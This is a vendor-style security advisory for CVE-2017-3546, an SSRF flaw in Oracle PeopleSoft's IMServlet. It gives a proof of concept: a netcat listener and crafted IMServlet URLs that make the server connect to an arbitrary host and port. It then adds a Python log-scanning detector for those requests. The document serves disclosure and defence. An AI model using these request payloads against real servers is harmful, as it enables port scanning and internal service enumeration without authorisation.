Application: Oracle PeopleSoft
**Versions Affected:** ToolsRelease: 8.55.03; ToolsReleaseDB: 8.55; PeopleSoft HCM 9.2
Vendor: Oracle
**Bugs:** SSRF
**Reported:** 23.12.2016
**Vendor response:** 24.12.2016
**Date of Public Advisory:** 18.04.2017
**Reference:** Oracle CPU April 2017
Authors: Roman Shalymov (ERPScan)
Class: SSRF
Impact: cross-site port attack, service enumeration
Remotely Exploitable: yes
Locally Exploitable: yes
CVE: CVE-2017-3546
CVSS Base Score v3: 6.5 / 10
CVSS Base Vector:
Metric | Value |
---|---|
AV: Attack Vector (Related exploit range) | Network (N) |
AC: Attack Complexity (Required attack complexity) | Low (L) |
PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
UI: User Interaction (Required user participation) | None (N) |
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
C: Impact to Confidentiality | Low (L) |
I: Impact to Integrity | Low (L) |
A: Impact to Availability | None (N) |
An attacker can force a vulnerable server to trigger malicious requests to third-party servers and/or to internal resources. This vulnerability can then be leveraged to launch specific attacks such as cross-site port attack, service enumeration, and various other attacks.
ToolsRelease: 8.55.03
ToolsReleaseDB: 8.55
PeopleSoft HCM 9.2
To correct this vulnerability, implement Oracle CPU April 2017.
1. nc -l -p # on some host
In browser
http://PPLSOFTSRV:8000/IMServlet?Method=CONNECT
http://PPLSOFTSRV::8000/IMServlet?Method=GOOGLE_PRESENCE&im_to_user=abc&im_server_name=GOOGLE&im_server=SOMEHOST:OPEN_PORT/?param=var%23"
Response in netcat
GET /?param=var HTTP/1.1
User-Agent: Java1.7.0_95
Host: SOMEHOST:OPEN_PORT
Accept: text/html, image/gif, image/jpeg, /; q=.2
Connection: Keep-Alive
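
A defender-side check for the request pattern above, as an added example that is not part of the original advisory: it scans web access logs for `IMServlet` requests whose `im_server` parameter carries URL path, query or fragment characters, or names a host outside an allowlist. The common log format, the allowlisted host `im.corp.example` and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the only IM server this site legitimately queries for presence.
ALLOWED_IM_SERVERS = {"im.corp.example"}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (common log format assumed).
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Apr/2017:10:00:00 +0000] "GET /IMServlet?Method=CONNECT HTTP/1.1" 200 12',
    '10.0.0.5 - - [18/Apr/2017:10:00:02 +0000] "GET /IMServlet?Method=GOOGLE_PRESENCE'
    '&im_to_user=abc&im_server_name=GOOGLE&im_server=SOMEHOST:8080/?param=var%23 HTTP/1.1" 200 12',
    '10.0.0.7 - - [18/Apr/2017:10:01:00 +0000] "GET /IMServlet?Method=GOOGLE_PRESENCE'
    '&im_to_user=bob&im_server_name=GOOGLE&im_server=im.corp.example HTTP/1.1" 200 12',
    '10.0.0.9 - - [18/Apr/2017:10:02:00 +0000] "GET /IMServlet?Method=GOOGLE_PRESENCE'
    '&im_to_user=abc&im_server_name=GOOGLE&im_server=10.0.0.1:22 HTTP/1.1" 200 12',
]

def check_im_server(value):
    """Return a reason string if a decoded im_server value is suspicious, else None."""
    # A presence server is a host (optionally host:port); URL syntax is a red flag.
    if re.search(r"[/?#@\\]", value):
        return "im_server carries URL path/query/fragment characters"
    host, _, port = value.partition(":")
    if port and not port.isdigit():
        return "im_server has a non-numeric port"
    if host.lower() not in ALLOWED_IM_SERVERS:
        return "im_server host not in allowlist"
    return None

def scan(lines):
    """Return (line number, decoded im_server value, reason) for each finding."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/imservlet"):
            continue
        # parse_qs percent-decodes values, so %23 is seen as '#'.
        for value in parse_qs(url.query).get("im_server", []):
            reason = check_im_server(value)
            if reason:
                findings.append((lineno, value, reason))
    return findings

if __name__ == "__main__":
    for lineno, value, reason in scan(SAMPLE_LOG):
        print(f"line {lineno}: im_server={value!r}: {reason}")
```
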